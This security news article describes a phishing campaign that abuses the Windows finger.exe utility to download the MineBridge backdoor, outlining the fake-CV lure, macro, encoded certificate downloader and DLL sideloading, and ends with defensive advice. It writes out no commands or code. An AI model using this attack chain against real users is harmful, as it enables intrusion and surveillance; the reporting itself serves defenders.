Hackers employ various phishing campaigns and as much they are tried to shut down, they always find new ways. Recently, a new phishing campaign was identified which uses the Windows Finger command to download a malware variant called MineBridge.
The ‘Finger’ command is a utility that initially originated in Linux and Unix operating systems and it basically allows local users to retrieve a list of users on a remote machine or information about a particular remote user.
The utility also allows commands to be executed to find out whether a specific user is logged in, however, this is rarely used today. Nowadays, even Windows includes a finger.exe command that performs the same function.
The finger utility previously had security concerns as well because it was abused to find out basic information about users that can be used in social engineering attacks. This time the problem arose when security researchers found out that the finger command can be used as LOLBin to download malware or exfiltrate data without alerting the security solutions such as antivirus mechanisms.
FireEye first reported MineBridge malware in December 2019 when they observed some phishing campaigns targeting South Korean financial institutions. The emails were disguised as Word documents containing details of job applicants targeted for specific firms.
The sender very cleverly also recommended that the CV of the candidate should be considered even if there were no current openings. The emails were not only well written but also believable.
When the email is opened, it views a document which states that the document was created using the old version of Windows and to view the content, the user needs to ‘enable editing’ and then ‘enable content’. This installs the backdoor via the malicious macro that fetches and downloads a Base64 encoded certificate.
The certificate is a malware downloader that uses DDL hijacking to install the MineBridge backdoor. Once installed, the malware will give full control of the device to the remote threat actor who will have access to the infected device’s microphone and will be able to listen in and perform other malicious activities.
Interesting, downloads a teamviewer executable and a malicious dll, sideloaded by teamviewer, containing MINEBRIDGE malware – The behaviour is the same, apart from the finger.exe, even the TLD c2 *.top of fireeye report – https://t.co/qKFFlUnA0phttps://t.co/4hMJPlAGJg pic.twitter.com/QdIuwbe2Gq
— Giuseppe `N3mes1s` (@gN3mes1s) January 15, 2021
The easiest way to combat these attacks is by downloading advanced spam filtering solutions that block suspicious emails and make sure they do not reach the user’s inbox. Since the Finger command itself is rarely used today, it is recommended that the administrators block the finger.exe command through AppLocker or other methods.